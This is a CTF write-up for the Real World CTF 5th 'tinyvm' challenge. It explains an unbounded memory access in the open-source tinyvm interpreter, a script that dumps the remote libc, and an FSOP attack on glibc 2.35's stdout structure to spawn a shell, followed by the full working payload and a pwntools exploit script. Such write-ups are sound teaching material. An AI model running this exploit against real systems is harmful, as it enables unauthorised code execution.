Skip to main content
  1. Posts/

[Real World CTF 5th] - tinyvm

·15 mins
CTF writeups VM FSOP
Table of Contents

This is a CTF challenge called TinyVM. The author is very lazy, not wanting to write a description of the challenge, and the code is directly cloned from https://github.com/jakogut/tinyvm. So you can just nc <host> <port> and get flag.

Introduction
#

As stated in the description, this challenge requires the participants to exploit the lastest version of an open-source virtual machine project available on GitHub. The first step is to clone the project and compile the binary with debug symbols.

make DEBUG=yes

This creates and executable called tvmi, which probably stands for tinyvm interpreter, since running it without arguments spits out the following error.

File was not found, or does not exist. Unable to interpret.

The remote server also asks for a file upon connection.

Input the size of the vm file you want to run(< 4096) :

Is this file supposed to be in assembly or in compiled binary? Do they use custom opcodes? Let’s read the source to find out.

The VM
#

The main function creates a tvm_ctx object, interprets the given file and runs the resulting program if no error occured.

int main(int argc, char **argv)
{
	struct tvm_ctx *vm = tvm_vm_create();

	if (vm != NULL && tvm_vm_interpret(vm, argv[1]) == 0)
		tvm_vm_run(vm);

	tvm_vm_destroy(vm);

	return 0;
}

The structure tvm_ctx contains pointers to two other structures.

struct tvm_ctx {
    struct tvm_prog *prog;
    struct tvm_mem *mem;
};

The tvm_prog structure contains all the compiled instructions and their arguments.

struct tvm_prog {
	int start;

	int num_instr;
	int *instr;
	int ***args;

	int **values;
	int num_values;

	struct tvm_htab_ctx *defines;
	struct tvm_htab_ctx *label_htab;
};

The instructions are stored in an array of int and the arguments are stored in pairs, one for each instruction.

The tvm_mem structure is basically a wrapper around a pointer to the allocated memory region which acts as the virtual memory of the machine.

struct tvm_mem {
	int FLAGS;
	int remainder;

	void *mem_space;
	int mem_space_size;

	union tvm_reg_u *registers;
};

The heart of the VM is a big switch called on every instruction opcode.

switch (vm->prog->instr[*instr_idx]) {
/* nop   */	case 0x0:  break;
/* int   */	case 0x1:  /* unimplemented */ break;
/* mov   */	case 0x2:  *args[0] = *args[1]; break;
/* push  */	case 0x3:  tvm_stack_push(vm->mem, args[0]); break;
/* pop   */	case 0x4:  tvm_stack_pop(vm->mem, args[0]); break;
/* pushf */	case 0x5:  tvm_stack_push(vm->mem, &vm->mem->FLAGS); break;
/* popf  */	case 0x6:  tvm_stack_pop(vm->mem, args[0]); break;
/* inc   */	case 0x7:  ++(*args[0]); break;
/* dec   */	case 0x8:  --(*args[0]); break;
/* add   */	case 0x9:  *args[0] += *args[1]; break;
/* sub   */	case 0xA:  *args[0] -= *args[1]; break;
/* mul   */	case 0xB:  *args[0] *= *args[1]; break;
/* div   */	case 0xC:  *args[0] /= *args[1]; break;
/* mod   */	case 0xD:  vm->mem->remainder = *args[0] % *args[1]; break;
/* rem   */	case 0xE:  *args[0] = vm->mem->remainder; break;
/* not   */	case 0xF:  *args[0] = ~(*args[0]); break;
/* xor   */	case 0x10:  *args[0] ^= *args[1];  break;
/* or    */	case 0x11: *args[0] |= *args[1];   break;
/* and   */	case 0x12: *args[0] &= *args[1];   break;
/* shl   */	case 0x13: *args[0] <<= *args[1];  break;
/* shr   */	case 0x14: *args[0] >>= *args[1];  break;
/* cmp   */	case 0x15: vm->mem->FLAGS =
				((*args[0] == *args[1]) | (*args[0] > *args[1]) << 1);
				break;
/* call	 */	case 0x17: tvm_stack_push(vm->mem, instr_idx);
/* jmp	 */	case 0x16: *instr_idx = *args[0] - 1; break;
/* ret   */	case 0x18: tvm_stack_pop(vm->mem, instr_idx);
				break;
/* je    */	case 0x19:
				*instr_idx = (vm->mem->FLAGS & 0x1)
					? *args[0] - 1 : *instr_idx;
				break;
/* jne   */	case 0x1A:
				*instr_idx = (!(vm->mem->FLAGS & 0x1))
					? *args[0] - 1 : *instr_idx;
				break;
/* jg    */	case 0x1B:
				*instr_idx = (vm->mem->FLAGS & 0x2)
					? *args[0] - 1 : *instr_idx;
				break;
/* jge   */	case 0x1C:
				*instr_idx = (vm->mem->FLAGS & 0x3)
					? *args[0] - 1 : *instr_idx;
				break;
/* jl    */	case 0x1D:
				*instr_idx = (!(vm->mem->FLAGS & 0x3))
					? *args[0] - 1 : *instr_idx;
				break;
/* jle   */	case 0x1E:
				*instr_idx = (!(vm->mem->FLAGS & 0x2))
					? *args[0] - 1 : *instr_idx;
				break;
/* prn   */	case 0x1F: printf("%i\n", *args[0]);
};

So the VM does indeed use custom opcodes. The comments help us recongnize standard CPU operations, except for the last one. The prn instruction prints out its argument as an integer, which can be valuable in debugging.

An example would help better understand the inner workings of the VM. Let’s create a small assembly file and feed it to the interpreter.

mov eax, 0xdeadbeef
mov [0], eax
prn eax

When the input file is interpreted, the tvm_prog structure is populated with the content of each instruction. Since the debugging symbols are enabled, we can directly print the content of the variables from GDB.

gef  p *(struct tvm_mem *)vm->mem  
$1 = {
  FLAGS = 0x0,
  remainder = 0x0,
  mem_space = 0x7ffff3db1010,
  mem_space_size = 0x4000000,
  registers = 0x55555555c2f0
}

The most interesting part is how the arguments are setup.

gef  telescope vm->prog->args 
0x0000555d873a8930+0x0000: 0x0000555d873a8890    0x0000555d873982f0    0x0000000000000000
0x0000555d873a8938+0x0008: 0x0000555d873a88f0    0x00007f184f6e9010    0x0000000000000000
0x0000555d873a8940+0x0010: 0x0000555d873a8910    0x0000555d873982f0    0x0000000000000000
0x0000555d873a8948+0x0018: 0x0000000000000000

The args field is an null-terminated array of individual heap chunks related to each instruction. If the argument is a constant, like in our first instruction, it’s also put in its own heap chunk.

gef  telescope vm->prog->args[0]
0x000055555556c890+0x0000: 0x000055555555c2f0    0x0000000000000000
0x000055555556c898+0x0008: 0x000055555556c8b0    0x00000000deadbeef

Here we can also notice that every register has its chunk, as the first argument is eax. However, when the argument is a memory reference, like in our second instruction, the address points directly inside the vm->mem->mem_space memory region.

gef  telescope vm->prog->args[1] 
0x000055555556c8f0+0x0000: 0x00007ffff3db1010    0x0000000000000000
0x000055555556c8f8+0x0008: 0x000055555555c2f0    0x0000000000000000

It’s interesting to note that even though our program references the memory at offset 0, the argument actually points 16 bytes after the start of the memory region.

Finding the bug
#

Now that we have a better understanding of how the VM works, it’s time to break it. The vulnerability will most likely originate from the implementation of an instruction inside the big switch. The int instruction is interesting but it’s not yet implemented. All the other instructions don’t do anything that could lead to memory corruption, except for the mov instruction. It doesn’t seem to have any bound check so maybe we can access memory outside the dedicated memory region? Let’s test it out!

The vm->mem field is initialized in the tvm_vm_create function with the value MIN_MEMORY_SIZE which evaluates to 64*1024*1024, or 64 MB.

struct tvm_ctx *tvm_vm_create()
{
	struct tvm_ctx *vm =
		(struct tvm_ctx *)calloc(1, sizeof(struct tvm_ctx));

	if (!vm)
		return NULL;
	vm->mem = tvm_mem_create(MIN_MEMORY_SIZE);
	vm->prog = tvm_prog_create();

	if (!vm->mem || !vm->prog) {
		tvm_vm_destroy(vm);
		return NULL;
	}

	tvm_stack_create(vm->mem, MIN_STACK_SIZE);
	return vm;
}

Inside the tvm_mem_create function, this value is directly passed to calloc.

struct tvm_mem *tvm_mem_create(size_t size)
{
	struct tvm_mem *m =
		(struct tvm_mem *)calloc(1, sizeof(struct tvm_mem));

	m->registers = calloc(NUM_REGISTERS, sizeof(union tvm_reg_u));

	m->mem_space_size = size;
	m->mem_space = (int *)calloc(size, 1);

	return m;
}

However, since the size requested is quite large, calloc will internally use mmap to allocate the region. This means that the region will be contiguous to the mapping of libc, which we can confirm in GDB.

0x000055555555c000 0x000055555557d000 0x0000000000000000 rw- [heap]
0x00007ffff3db1000 0x00007ffff7db5000 0x0000000000000000 rw- 
0x00007ffff7db5000 0x00007ffff7ddb000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x00007ffff7ddb000 0x00007ffff7f30000 0x0000000000026000 r-x /usr/lib/x86_64-linux-gnu/libc.so.6
0x00007ffff7f30000 0x00007ffff7f83000 0x000000000017b000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x00007ffff7f83000 0x00007ffff7f87000 0x00000000001ce000 r-- /usr/lib/x86_64-linux-gnu/libc.so.6
0x00007ffff7f87000 0x00007ffff7f89000 0x00000000001d2000 rw- /usr/lib/x86_64-linux-gnu/libc.so.6

There is indeed a memory region of size 0x4004000 just before libc! We can calculate which offset inside the VM will point to the beginning of libc.

(0x00007ffff7db5000 - 0x00007ffff3db1010) / 4 = 0x1000ffc

We must divide by 4 because each offset inside the VM points to an int.

Let’s write a small proof-of-concept program and try to read the first value of libc.

mov eax, [0x1000ffc]
prn eax

It does work! The printed value corresponds to the ELF magic bytes and we can also see in GDB that the argument does point to the start of libc.

gef  telescope vm->prog->args[0] 
0x000055555556c7a0+0x0000: 0x000055555555c2f0    0x0000000000000000
0x000055555556c7a8+0x0008: 0x00007ffff7db5000    0x03010102464c457f

Now we just have to transform that read/write primitive into a shell!

Exploitation
#

Let’s recap what we have and what we don’t.

  • We have a 4 bytes read/write primitive relative to the start of an mmaped memory region
  • The binary has NX enabled, so no shellcode allowed
  • The binary has ASLR and PIE enabled, so we can’t use fixed addresses
  • The binary only has partial RELRO, so we can mess around with GOT entries

Let’s not forget that the whole assembly file has to be submitted at once, so we can’t leak addresses to use them afterwards. Fortunately, we have access to a wide range of assembly instructions, so we can compute differents offsets on-the-fly inside our program.

My first thought was to overwrite a GOT entry with the address of system. However, there is no pointer inside libc, the heap or the VM memory region that points to the binary. Therefore, with the current setup, we actually have no way to leak the base address of PIE.

I chose to opt for a similar approach that didn’t need a PIE leak. The environ symbol inside libc points to the stack. We can use this leak to write a simple system(/bin/sh) ROP chain on the stack. Then, we can create an adjustable NOP sled to lead the program into it.

All these strategies require knowing the offsets of a few symbols inside libc. However, no libc file, no version number and not even a Dockerfile were provided with the challenge. Therefore, I decided to write a simple script to read and extract the remote libc.

Extracting libc
#

We can read and print 4 bytes at a time from the remote libc and reconstruct it on our local machine. The only problem is that we don’t know how many bytes to read. However, we can approximate the size of the remote libc with our own. My local libc is version 2.36 and takes 0x1d4000 bytes in memory, so that’s how much I chose to read. Our assembly file can be at most 4096 bytes long, so we can read about 0x200 bytes at a time. I could have made a loop in assembly, but I preferred doing it in the python script.

def dump_libc(size, offset=0):
    template = "mov eax, [{}]\nprn eax\n"
    payload = ""
    for i in range(size//4):
        payload += template.format(LIBC_OFFSET + (offset//4) + i)
    p.sendline(str(len(payload)).encode())
    p.send(payload.encode())
    
    p.recvuntil(b"(< 4096) : ")
    result = p.recvall()
    with open("libc.so.6", "ab") as f:
        for line in result.decode().splitlines():
            value = int(line)
            if value < 0:
                value = value + 0x100000000
            f.write(p32(value))

total_size = 0
while total_size < 0x1d4000:
    print(f"[*] dumping from offset {total_size}")
    p = remote(HOST, PORT)
    dump_libc(0x200, total_size)
    total_size += 0x200

In restrospect, this wasn’t the smartest way to go about it. All I really wanted was the version string, located near the end of libc. It can be found quickly with strings.

strings libc.so.6 | grep LIBC

Unfortunately, it wasn’t inside the extracted libc. This probably meant that the remote version was a little bigger than my local version. Therefore, I continued extracting 0x1000 bytes at a time until it finally appeared.

GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35

We can deduce from that version that the server is probably using an Ubuntu 22.04 docker instance.

Afterwards, I used readelf -n to retreive the build ID and I downloaded the corresponding libc from the amazing libc database.

curl -X POST -H 'Content-Type: application/json' --data '{"buildid": "69389d485a9793dbe873f0ea2c93e02efaa9aa3d"}' 'https://libc.rip/api/find'

Great! Now we can use the symbols to craft a ROP chain and get a shell, right? Well, it’s not as simple as that. Unfortunately, the VM is 32 bits, which means that the furthest offset we can access with our read/write primitive is 0xffffffff. Since the host system is 64 bits, the randomized addresses of memory regions are usually more than 0xffffffff bytes apart. This means that we can’t access the stack, the GOT or even the heap. Therefore, our only target for exploitation is libc (and maybe ld but we won’t need it).

In the past, we might have tried to setup a malicious __free_hook or something similar to get a shell. However, these are disabled in GLIBC 2.35, which leaves us with only one option…


Update
#

I later came accross this exploit script which corrupts the internal GOT entries of libc to get a shell. It also uses multiple operations on esp to access offsets greater than 0xffffffff. Very clever!


FSOP
#

File Stream Oriented Programming (FSOP) is a technique that uses internal libc structures to get code execution from memory corruption. The fact that it only relies on libc makes it perfect for this scenario.

I won’t go into too much details about the technique here because I’m planning on writing an in-depth post about FSOP later.

Before doing anything, we need to target a specific file stream. Since the prn opcode calls printf, we can use stdout. It’s preferable to initialize all the buffers inside stdout before messing with it, which we can do by calling printf once.

mov eax, 1
prn eax

Then, we have a few values to put in specific places. I chose to use the path inside _IO_wfile_underflow and __libio_codecvt_in. We have to change _flags to pass the _IO_NO_READS check.

mov [{stdout_flags}], 0xfbad2a80

We also need to make sure that _IO_read_ptr is lower than _IO_read_end. Since both pointers are initialized, we only need to mask the lower 32 bits of _IO_read_ptr.

mov [{stdout_read_ptr}], 0

The address that’s eventually going to be called will be stored in rbp. This value comes from r13 with the instruction mov rbp,QWORD PTR [r13+0x28]. However, r13 must point to a NULL value to skip a call to PTR_DEMANGLE which would segfault. Therefore, we can make r13 point to an unused part of the stdout structure. The value of r13 comes from rdi with the instruction mov r13, QWORD PTR [rdi]. Therefore, we can also put the address of r13 inside the stdout structure and make rdi point to it. All the addresses used are offsets of the stdout structure, whose address is stored at the _IO_2_1_stdout_ symbol. Therefore, we can calculate all the addresses we need by adding offsets to this value. Since the VM registers are only 32 bits, we need 2 mov instructions to copy a 64 bits address.

mov eax, [{stdout+1}]
mov [{stdout_r13+1}], eax
mov eax, [{stdout}]
add eax, {r13_offset}
mov [{stdout_r13}], eax

The value of rdi is actually the _codecvt field of stdout. We can replace it with a pointer to our desired r13 value.

mov eax, [{stdout+1}]
mov [{stdout_codecvt+1}], eax
mov eax, [{stdout}]
add eax, {rdi_offset}
mov [{stdout_codecvt}], eax

We can finally put the payload target address in [r13+0x28]. The address of system would be perfect because we could just make rdi point to /bin/sh and we would get a shell. However, rdi needs to point to the value of r13. Instead, we can use a nifty little gadget to modify the value of rdi afterwards.

add rdi, 0x10
jmp rcx

We just have to manually put the string /bin/sh at the right spot.

mov [{stdout_binsh}], 0x6e69622f
mov [{stdout_binsh+1}], 0x0068732f

Then, we can put the address of the gadget at [r13+0x28].

mov eax, [{stdout+1}]
mov [{stdout_rbp+1}], eax
mov eax, [{stdout}]
sub eax, {gadget_offset}
mov [{stdout_rbp}], eax

The address of system now has to go in rcx, which comes from the _IO_read_end field of stdout.

mov eax, [{stdout+1}]
mov [{stdout_read_end+1}], eax
mov eax, [{stdout}]
sub eax, {system_offset}
mov [{stdout_read_end}], eax

Finally, we can modify the vtable pointer at the end of stdout to make _IO_file_xsgetn, called internally by printf, point to _IO_wfile_underflow.

mov eax, [{stdout_vtable}]
sub eax, {vtable_offset}
mov [{stdout_vtable}], eax

We just need to call printf again to get a shell!

prn eax

Here is the complete payload for the remote instance. The actual values will vary from one version of libc to another.

mov eax, 1
prn eax

mov [17332700], 0xfbad2a80
mov [17332702], 0

mov eax, [17332759]
mov [17332717], eax
mov eax, [17332758]
add eax, 72
mov [17332716], eax

mov eax, [17332759]
mov [17332705], eax
mov eax, [17332758]
sub eax, 1874464
mov [17332704], eax

mov eax, [17332759]
mov [17332739], eax
mov eax, [17332758]
add eax, 64
mov [17332738], eax

mov eax, [17332759]
mov [17332729], eax
mov eax, [17332758]
sub eax, 749392
mov [17332728], eax

mov [17332722], 0x6e69622f
mov [17332723], 0x0068732f

mov eax, [17332754]
sub eax, 1368
mov [17332754], eax

prn eax

Flag: rwctf{A_S1gn_In_CHllenge}

In the end, this wasn’t a very difficult challenge, but I think it was quite harder than the one I solved last year, so that’s progress! As always, the Real World CTF is a great opportunity to learn.

Full exploit script
#

#!/usr/bin/python3
from pwn import *
import os

REMOTE = False
NAME = "tvmi"
if REMOTE or args["REMOTE"]:
    p = remote(HOST, PORT)
    libc = ELF("./libc.so.6")
    gadget_addr = 0x0000000000163830
else:
    p = None
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    gadget_addr = 0x000000000014023c

LIBC_OFFSET = 0x1000ffc

def dump_libc(size, offset=0):
    template = "mov eax, [{}]\nprn eax\n"
    payload = ""
    for i in range(size//4):
        payload += template.format(LIBC_OFFSET + (offset//4) + i)
    p.sendline(str(len(payload)).encode())
    p.send(payload.encode())
    
    p.recvuntil(b"(< 4096) : ")
    result = p.recvall()
    with open("libc.so.6", "ab") as f:
        for line in result.decode().splitlines():
            value = int(line)
            if value < 0:
                value = value + 0x100000000
            f.write(p32(value))

DUMP = False
if DUMP or args["DUMP"]:
    # Dump mode
    os.remove("libc.so.6")
    total_size = 0
    while total_size < 0x1dd000:
        print(f"[*] dumping from offset {total_size}")
        dump_libc(0x200, total_size)
        total_size += 0x200
        p = remote("198.11.180.84", 6666)
else:
    # Exploit mode
    vtable_offset = (libc.sym["_IO_file_jumps"] - libc.sym["_IO_wfile_jumps"] + 24)

    # Convert addresses to VM memory offsets
    stdout = LIBC_OFFSET + (libc.sym["stdout"]//4)
    stdout_flags = LIBC_OFFSET + (libc.sym["_IO_2_1_stdout_"]//4)
    stdout_read_ptr = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*1))//4)
    stdout_read_end = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*2))//4)
    stdout_r13 = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*8))//4)
    stdout_binsh = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*11))//4)
    stdout_rbp = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*14))//4)
    stdout_codecvt = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*19))//4)
    stdout_vtable = LIBC_OFFSET + ((libc.sym["_IO_2_1_stdout_"] + (8*27))//4)

    # Calculate offsets to add or substract
    rdi_offset = 8*8 # [rdi] = r13
    r13_offset = 8*9 # [r13] = 0
    system_offset = libc.sym["_IO_2_1_stdout_"] - libc.sym["system"]
    gadget_offset = libc.sym["_IO_2_1_stdout_"] - gadget_addr

    # Craft the payload
    payload = f"""mov eax, 1
prn eax

mov [{stdout_flags}], 0xfbad2a80
mov [{stdout_read_ptr}], 0

mov eax, [{stdout+1}]
mov [{stdout_r13+1}], eax
mov eax, [{stdout}]
add eax, {r13_offset}
mov [{stdout_r13}], eax

mov eax, [{stdout+1}]
mov [{stdout_read_end+1}], eax
mov eax, [{stdout}]
sub eax, {system_offset}
mov [{stdout_read_end}], eax

mov eax, [{stdout+1}]
mov [{stdout_codecvt+1}], eax
mov eax, [{stdout}]
add eax, {rdi_offset}
mov [{stdout_codecvt}], eax

mov eax, [{stdout+1}]
mov [{stdout_rbp+1}], eax
mov eax, [{stdout}]
sub eax, {gadget_offset}
mov [{stdout_rbp}], eax

mov [{stdout_binsh}], 0x6e69622f
mov [{stdout_binsh+1}], 0x0068732f

mov eax, [{stdout_vtable}]
sub eax, {vtable_offset}
mov [{stdout_vtable}], eax

prn eax""".encode()

    if p is None:
        with open("prog.txt", "wb") as f:
            f.write(payload)
        print("Payload written to prog.txt")
    else:
        p.recvuntil(b"(< 4096) : ")
        p.sendline(str(len(payload)).encode())
        p.send(payload)

        p.interactive()